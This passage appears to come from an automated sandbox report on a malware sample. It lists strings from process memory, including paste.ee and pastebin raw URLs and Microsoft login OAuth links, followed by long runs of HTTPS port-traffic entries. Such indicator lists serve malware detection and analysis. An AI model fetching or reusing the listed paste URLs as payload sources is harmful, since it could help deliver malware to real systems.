                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
                  Source: edb.log.13.dr, qmgr.db.13.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 0000000D.00000003.1216551466.0000017B06EE0000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9192A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023501299000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: iexpress.exe, 0000000C.00000003.1447615394.0000000007F50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: powershell.exe, 00000007.00000002.1170496094.0000023510073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D91985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D91593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D91593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235003E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501A60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9067C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/r/4
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/r/49ZDOxRT/0
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9067C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90658000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/r/Iheui3WE/0
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9067C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/r/Iheui3WE/0P
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023501788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235016DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501A60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235016B8000.00000004.00000800.00020000.00000000.sdmp, dll01.txt.7.dr | String found in binary or memory: https://paste.ee/r/eqs49sJc/0
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235016B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/r/eqs49sJc/0P
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023501A60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/r/eqs49sJc/0p
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D904EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.eeXI
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023500222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90592000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D902A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D90592000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D90592000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D902A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/XHtEkzdv
                  Source: powershell.exe, 00000007.00000002.1178028922.000002357A5B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/naAgdcTG
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20w
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2231547950.0000000005936000.00000004.10000000.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49863
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49861
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknown | Network traffic detected: HTTP traffic on port 49932 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49898 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49875 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49857
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49856
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49855
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49909 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknown | Network traffic detected: HTTP traffic on port 49943 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
                  Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknown | Network traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49963
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49962
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49961
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49960
                  Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49933 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49959
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknown | Network traffic detected: HTTP traffic on port 49921 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49957
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49956
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49955
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49833
                  Source: unknown | Network traffic detected: HTTP traffic on port 49887 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49954
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49952
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49951
                  Source: unknown | Network traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49950
                  Source: unknown | Network traffic detected: HTTP traffic on port 49944 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknown | Network traffic detected: HTTP traffic on port 49955 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49949
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49827
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49948
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49947
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49946
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49945
                  Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49944
                  Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49943
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknown | Network traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknown | Network traffic detected: HTTP traffic on port 49945 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknown | Network traffic detected: HTTP traffic on port 49885 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49899
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49898
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49897
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49896
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
